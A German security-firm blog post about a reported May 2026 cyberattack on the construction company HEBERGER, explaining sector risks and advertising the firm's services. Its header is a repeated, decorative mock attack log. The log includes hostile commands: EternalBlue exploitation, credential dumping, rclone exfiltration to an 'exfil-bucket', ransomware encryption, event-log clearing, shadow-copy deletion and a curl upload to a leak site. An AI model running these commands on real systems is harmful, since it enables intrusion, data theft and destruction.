Scroll to top
    $ nmap -sS -p- 10.42.18.0/24
    Discovered open port 22/tcp on 10.42.18.7
    Discovered open port 445/tcp on 10.42.18.12
    [+] SMB signing: disabled
    Permission denied (publickey).
    $ exploit/windows/smb/ms17_010_eternalblue
    [*] Sending stage (200774 bytes)
    [+] meterpreter session 4 opened
    meterpreter > getsystem
    ...got system via technique 1.
    meterpreter > hashdump
    Administrator:500:aad3b435b51404ee:31d6cfe0d16ae...
    $ powershell -enc JABzAD0ATgBlAHcALQBPAGIAagBlAGM...
    [+] Privilege escalation successful
    [*] Enumerating Active Directory...
    DC=heberger,DC=local : 1.347 user objects
    [*] Dumping NTDS.dit ...
    [+] Kerberos tickets exfiltrated
    $ rclone copy /projekte/baupläne s3://exfil-bucket
    Transferred: 142.7 GiB / 142.7 GiB, 100%
    $ ./ransom.exe --target *.local --speed=fast
    [!] Encrypting C:\Projekte\Ausschreibungen\...
    [!] Encrypting C:\Finanzen\Kalkulationen\...
    [!] Encrypting D:\Backups\nightly\...
    [+] 47.812 files encrypted
    0xDEAD 0xBEEF 0x4843 0x4B45 0x4400 // 'HACKED'
    $ wevtutil cl Security
    [*] Sending stage (200774 bytes)
    [+] meterpreter session 4 opened
    meterpreter > getsystem
    ...got system via technique 1.
    meterpreter > hashdump
    Administrator:500:aad3b435b51404ee:31d6cfe0d16ae...
    $ powershell -enc JABzAD0ATgBlAHcALQBPAGIAagBlAGM...
    [+] Privilege escalation successful
    [*] Enumerating Active Directory...
    DC=heberger,DC=local : 1.347 user objects
    [*] Dumping NTDS.dit ...
    [+] Kerberos tickets exfiltrated
    $ rclone copy /projekte/baupläne s3://exfil-bucket
    Transferred: 142.7 GiB / 142.7 GiB, 100%
    $ ./ransom.exe --target *.local --speed=fast
    [!] Encrypting C:\Projekte\Ausschreibungen\...
    [!] Encrypting C:\Finanzen\Kalkulationen\...
    [!] Encrypting D:\Backups\nightly\...
    [+] 47.812 files encrypted
    0xDEAD 0xBEEF 0x4843 0x4B45 0x4400 // 'HACKED'
    $ wevtutil cl Security
    $ vssadmin delete shadows /all /quiet
    [!] Backup catalog deleted
    $ curl -X POST darknet.onion/leak --data @manifest.json
    [+] Victim 'HEBERGER' published 07/05/2026 04:17 UTC
    // CVE-pending – initial access via exposed RDP
    tcp ESTABLISHED 185.220.101.42:443 -> 10.42.18.7:51822
    $ whoami /priv | findstr SeImpersonate
    [+] Privilege escalation successful
    [*] Enumerating Active Directory...
    DC=heberger,DC=local : 1.347 user objects
    [*] Dumping NTDS.dit ...
    [+] Kerberos tickets exfiltrated
    $ rclone copy /projekte/baupläne s3://exfil-bucket
    Transferred: 142.7 GiB / 142.7 GiB, 100%
    $ ./ransom.exe --target *.local --speed=fast
    [!] Encrypting C:\Projekte\Ausschreibungen\...
    [!] Encrypting C:\Finanzen\Kalkulationen\...
    [!] Encrypting D:\Backups\nightly\...
    [+] 47.812 files encrypted
    0xDEAD 0xBEEF 0x4843 0x4B45 0x4400 // 'HACKED'
    $ wevtutil cl Security
    $ vssadmin delete shadows /all /quiet
    [!] Backup catalog deleted
    $ curl -X POST darknet.onion/leak --data @manifest.json
    [+] Victim 'HEBERGER' published 07/05/2026 04:17 UTC
    // CVE-pending – initial access via exposed RDP
    tcp ESTABLISHED 185.220.101.42:443 -> 10.42.18.7:51822
    $ whoami /priv | findstr SeImpersonate
    SeImpersonatePrivilege Enabled
    [*] Lateral movement: PsExec to FILESRV02
    [+] OT segment reachable: 192.168.50.0/24
    $ nmap -sS -p- 10.42.18.0/24
    Discovered open port 22/tcp on 10.42.18.7
    Discovered open port 445/tcp on 10.42.18.12
    [+] SMB signing: disabled
    $ ./ransom.exe --target *.local --speed=fast
    [!] Encrypting C:\Projekte\Ausschreibungen\...
    [!] Encrypting C:\Finanzen\Kalkulationen\...
    [!] Encrypting D:\Backups\nightly\...
    [+] 47.812 files encrypted
    0xDEAD 0xBEEF 0x4843 0x4B45 0x4400 // 'HACKED'
    $ wevtutil cl Security
    $ vssadmin delete shadows /all /quiet
    [!] Backup catalog deleted
    $ curl -X POST darknet.onion/leak --data @manifest.json
    [+] Victim 'HEBERGER' published 07/05/2026 04:17 UTC
    // CVE-pending – initial access via exposed RDP
    tcp ESTABLISHED 185.220.101.42:443 -> 10.42.18.7:51822
    $ whoami /priv | findstr SeImpersonate
    SeImpersonatePrivilege Enabled
    [*] Lateral movement: PsExec to FILESRV02
    [+] OT segment reachable: 192.168.50.0/24
    $ nmap -sS -p- 10.42.18.0/24
    Discovered open port 22/tcp on 10.42.18.7
    Discovered open port 445/tcp on 10.42.18.12
    [+] SMB signing: disabled
    Permission denied (publickey).
    $ exploit/windows/smb/ms17_010_eternalblue
    [*] Sending stage (200774 bytes)
    [+] meterpreter session 4 opened
    meterpreter > getsystem
    ...got system via technique 1.
    $ vssadmin delete shadows /all /quiet
    [!] Backup catalog deleted
    $ curl -X POST darknet.onion/leak --data @manifest.json
    [+] Victim 'HEBERGER' published 07/05/2026 04:17 UTC
    // CVE-pending – initial access via exposed RDP
    tcp ESTABLISHED 185.220.101.42:443 -> 10.42.18.7:51822
    $ whoami /priv | findstr SeImpersonate
    SeImpersonatePrivilege Enabled
    [*] Lateral movement: PsExec to FILESRV02
    [+] OT segment reachable: 192.168.50.0/24
    $ nmap -sS -p- 10.42.18.0/24
    Discovered open port 22/tcp on 10.42.18.7
    Discovered open port 445/tcp on 10.42.18.12
    [+] SMB signing: disabled
    Permission denied (publickey).
    $ exploit/windows/smb/ms17_010_eternalblue
    [*] Sending stage (200774 bytes)
    [+] meterpreter session 4 opened
    meterpreter > getsystem
    ...got system via technique 1.
    meterpreter > hashdump
    Administrator:500:aad3b435b51404ee:31d6cfe0d16ae...
    $ powershell -enc JABzAD0ATgBlAHcALQBPAGIAagBlAGM...
    [+] Privilege escalation successful
    [*] Enumerating Active Directory...
    DC=heberger,DC=local : 1.347 user objects
    [*] Dumping NTDS.dit ...
    SeImpersonatePrivilege Enabled
    [*] Lateral movement: PsExec to FILESRV02
    [+] OT segment reachable: 192.168.50.0/24
    $ nmap -sS -p- 10.42.18.0/24
    Discovered open port 22/tcp on 10.42.18.7
    Discovered open port 445/tcp on 10.42.18.12
    [+] SMB signing: disabled
    Permission denied (publickey).
    $ exploit/windows/smb/ms17_010_eternalblue
    [*] Sending stage (200774 bytes)
    [+] meterpreter session 4 opened
    meterpreter > getsystem
    ...got system via technique 1.
    meterpreter > hashdump
    Administrator:500:aad3b435b51404ee:31d6cfe0d16ae...
    $ powershell -enc JABzAD0ATgBlAHcALQBPAGIAagBlAGM...
    [+] Privilege escalation successful
    [*] Enumerating Active Directory...
    DC=heberger,DC=local : 1.347 user objects
    [*] Dumping NTDS.dit ...
    [+] Kerberos tickets exfiltrated
    $ rclone copy /projekte/baupläne s3://exfil-bucket
    Transferred: 142.7 GiB / 142.7 GiB, 100%
    $ ./ransom.exe --target *.local --speed=fast
    [!] Encrypting C:\Projekte\Ausschreibungen\...
    [!] Encrypting C:\Finanzen\Kalkulationen\...
    [!] Encrypting D:\Backups\nightly\...
    Permission denied (publickey).
    $ exploit/windows/smb/ms17_010_eternalblue
    [*] Sending stage (200774 bytes)
    [+] meterpreter session 4 opened
    meterpreter > getsystem
    ...got system via technique 1.
    meterpreter > hashdump
    Administrator:500:aad3b435b51404ee:31d6cfe0d16ae...
    $ powershell -enc JABzAD0ATgBlAHcALQBPAGIAagBlAGM...
    [+] Privilege escalation successful
    [*] Enumerating Active Directory...
    DC=heberger,DC=local : 1.347 user objects
    [*] Dumping NTDS.dit ...
    [+] Kerberos tickets exfiltrated
    $ rclone copy /projekte/baupläne s3://exfil-bucket
    Transferred: 142.7 GiB / 142.7 GiB, 100%
    $ ./ransom.exe --target *.local --speed=fast
    [!] Encrypting C:\Projekte\Ausschreibungen\...
    [!] Encrypting C:\Finanzen\Kalkulationen\...
    [!] Encrypting D:\Backups\nightly\...
    [+] 47.812 files encrypted
    0xDEAD 0xBEEF 0x4843 0x4B45 0x4400 // 'HACKED'
    $ wevtutil cl Security
    $ vssadmin delete shadows /all /quiet
    [!] Backup catalog deleted
    $ curl -X POST darknet.onion/leak --data @manifest.json
    [+] Victim 'HEBERGER' published 07/05/2026 04:17 UTC
    meterpreter > hashdump
    Administrator:500:aad3b435b51404ee:31d6cfe0d16ae...
    $ powershell -enc JABzAD0ATgBlAHcALQBPAGIAagBlAGM...
    [+] Privilege escalation successful
    [*] Enumerating Active Directory...
    DC=heberger,DC=local : 1.347 user objects
    [*] Dumping NTDS.dit ...
    [+] Kerberos tickets exfiltrated
    $ rclone copy /projekte/baupläne s3://exfil-bucket
    Transferred: 142.7 GiB / 142.7 GiB, 100%
    $ ./ransom.exe --target *.local --speed=fast
    [!] Encrypting C:\Projekte\Ausschreibungen\...
    [!] Encrypting C:\Finanzen\Kalkulationen\...
    [!] Encrypting D:\Backups\nightly\...
    [+] 47.812 files encrypted
    0xDEAD 0xBEEF 0x4843 0x4B45 0x4400 // 'HACKED'
    $ wevtutil cl Security
    $ vssadmin delete shadows /all /quiet
    [!] Backup catalog deleted
    $ curl -X POST darknet.onion/leak --data @manifest.json
    [+] Victim 'HEBERGER' published 07/05/2026 04:17 UTC
    // CVE-pending – initial access via exposed RDP
    tcp ESTABLISHED 185.220.101.42:443 -> 10.42.18.7:51822
    $ whoami /priv | findstr SeImpersonate
    SeImpersonatePrivilege Enabled
    [*] Lateral movement: PsExec to FILESRV02
    [+] OT segment reachable: 192.168.50.0/24
    $ nmap -sS -p- 10.42.18.0/24
    ▌ SYSTEM COMPROMISED · 07.05.2026 04:17 UTC
    Zurück zum Blog
    IT-Sicherheit

    Cyberangriff auf Baukonzern HEBERGER – 350 Millionen Euro Unternehmen betroffen

    Die nächste deutsche Großfirma meldet einen Cybervorfall: Das Bauunternehmen HEBERGER aus Schifferstadt wurde am 7. Mai 2026 Ziel eines Cyberangriffs.

    12.05.2026 8 min Lesezeit
    Cyberangriff auf das Bauunternehmen HEBERGER aus Schifferstadt am 7. Mai 2026

    350 Mio. €

    Umsatz / Jahr

    1.350

    Mitarbeiter

    6 Ländern

    Aktiv in

    07.05.2026

    Angriff

    Was bisher bekannt ist

    Eine Firmensprecherin bestätigte den Vorfall gegenüber Medien (Quelle: Rheinpfalz). Der Angriff soll am Donnerstagmorgen, 7. Mai 2026, in den frühen Morgenstunden erfolgt sein. Offiziell spricht das Unternehmen von „unautorisierten Personen", die trotz hoher IT-Sicherheitsstandards Zugriff auf Systeme erhalten haben.

    Aktuell offen ist:

    ob Daten exfiltriert wurden
    ob Systeme verschlüsselt wurden
    welche Bereiche betroffen sind
    ob eine Ransomware-Gruppe beteiligt ist
    ob Kunden- oder Projektdaten kompromittiert wurden
    ob OT- und Maschinensteuerungen betroffen sind

    Gerade im Bau- und Industriebereich sind diese Daten hochsensibel: Baupläne, Ausschreibungen, Kalkulationen, Verträge oder Zugangsdaten zu Infrastrukturprojekten besitzen für Angreifer enormen Wert.

    Warum Bauunternehmen zunehmend im Fokus stehen

    Viele Unternehmen unterschätzen die Attraktivität der Baubranche für Cyberkriminelle. Dabei sind Baukonzerne aus mehreren Gründen besonders interessant:

    Hohe Umsätze

    Lösegeldforderungen orientieren sich am Jahresumsatz – Bau ist im dreistelligen Millionenbereich.

    Komplexe Lieferketten

    Material, Subunternehmer, Transporte – jede Unterbrechung kostet sechsstellig pro Tag.

    Viele externe Dienstleister

    Architekten, Ingenieurbüros, Subs – Hunderte Drittzugänge pro Großprojekt.

    Hybride IT-Umgebungen

    Cloud, On-Prem, Baustellen-VPN, Außendienst – komplex, schwer zu segmentieren.

    Alte OT-Systeme

    Maschinen- und Krananlagen mit jahrzehntealten Steuerungen ohne moderne Härtung.

    Mobile Baustellenzugriffe

    Tablets, Notebooks, BYOD direkt auf der Baustelle – außerhalb klassischer Perimeter.

    Hinzu kommt: Große Bauunternehmen arbeiten häufig mit Kommunen, Industrie, Energieversorgern oder kritischer Infrastruktur zusammen. Dadurch können Angriffe enorme Folgeschäden verursachen.

    Mittelstand im Visier – was vielen Firmen fehlt

    Der Fall HEBERGER zeigt erneut ein Muster, das sich seit Monaten verstärkt: Nicht nur Konzerne geraten ins Visier. Besonders mittelständische Unternehmen mit mehreren Standorten und gewachsener Infrastruktur stehen unter Druck. Viele investieren in klassische Firewalls und Antivirus, verfügen jedoch nicht über:

    Durchgängiges XDR/EDR-Monitoring

    → EDR/XDR Service

    Echte Netzwerksegmentierung

    → Netzwerk-Management

    24/7 Incident Detection

    → Managed Services

    Zero-Trust-Konzepte

    → IT-Sicherheit

    Aktive Threat-Intelligence-Auswertung

    → Glossar: Threat Intelligence

    Moderne Backup-Isolierung (immutable, offsite)

    → Managed Backup

    Genau dadurch können Angreifer oft wochen- oder monatelang unentdeckt in Netzwerken verbleiben.

    Die eigentliche Gefahr beginnt oft erst nach dem Angriff

    Ein Cyberangriff endet nicht mit der ersten Kompromittierung. Häufig folgen weitere, oft monatelange Wellen:

    Datenabfluss

    Verträge, Pläne, Personalakten verlassen unbemerkt das Netzwerk.

    Darknet-Veröffentlichungen

    Erpresser-Leakseiten setzen Unternehmen unter öffentlichen Druck.

    Erpressung

    Doppelte Erpressung: Lösegeld für Entschlüsselung und gegen Veröffentlichung.

    Lieferkettenangriffe

    Kompromittierte Zugänge werden für Angriffe auf Partner missbraucht.

    Identitätsdiebstahl

    AD-Daten und Personaldaten landen in Spear-Phishing- und Betrugskampagnen.

    Folgeangriffe auf Partner

    Echte Mailthreads werden gekapert, um weitere Firmen zu infiltrieren.

    Besonders kritisch wird es, wenn keine Lösegeldforderung auftaucht. In solchen Fällen liegt der Fokus oft auf den Daten selbst – nicht auf einer schnellen Erpressung. Das deutet auf staatlich motivierte oder spezialisierte Datenhändler hin.

    💡 Wasacon-Einschätzung: Cybersecurity wird zur Überlebensfrage

    Der Vorfall bei HEBERGER dürfte erneut Diskussionen über Sicherheitsbudgets im deutschen Mittelstand auslösen. Unternehmen mit hunderten Mitarbeitern und internationalen Standorten benötigen heute Sicherheitsstrukturen, die früher nur bei Konzernen üblich waren.

    👉 Moderne Angriffe sind keine Zufallsereignisse mehr. Sie sind organisiert. Automatisiert. Professionell. Und sie treffen längst nicht mehr nur „die Großen".

    Erkelenz Wegberg Wassenberg Hückelhoven Aachen Mönchengladbach Geilenkirchen Jülich Düren Krefeld

    Häufig gestellte Fragen

    Mittelstand & Konzerne unter Beschuss – verwandte Fälle

    HEBERGER reiht sich ein in eine Welle von Cybervorfällen gegen deutschen Mittelstand und Großunternehmen 2026:

    Diskussion

    0 Beiträge

    Lade Kommentare …
    Neuer Kommentar
    0/2000

    E-Mail wird nur zur Verifizierung verwendet, nicht veröffentlicht. Beiträge werden manuell geprüft.

    IT-Budget Quick-Check

    Wie viel sollte Ihr Unternehmen jährlich in IT investieren?

    Risiko-Level: Mittel · Multiplikator: 1.2×

    Richtwerte auf Basis von BSI/NIST/ENISA-Branchenbenchmarks. Keine verbindliche Empfehlung.

    Das könnte Sie auch interessieren

    Transparenzhinweis

    Dieser Artikel basiert auf öffentlich zugänglichen Informationen sowie auf Angaben einer Darknet-Leak-Seite. Die dort veröffentlichten Behauptungen konnten zum Zeitpunkt der Veröffentlichung nicht unabhängig verifiziert werden. Die Erwähnung eines Unternehmens bedeutet nicht automatisch, dass ein erfolgreicher Cyberangriff oder Datenabfluss stattgefunden hat.

    Haftungsausschluss: Die auf Wasacon bereitgestellten Inhalte dienen nur zu Informationszwecken. Wir garantieren nicht die Qualität, Genauigkeit oder Vollständigkeit der Informationen aus Drittquellen.

    Sind Zugangsdaten Ihres Unternehmens bereits im Umlauf?

    Wir prüfen Ihre Domain kostenlos gegen bekannte Infostealer- und Leak-Datenbanken – vertraulich und unverbindlich.

    Bekannt aus

    Wasa Consult, Data Recovery Service, Heinsberg, Nordrhein-Westfalen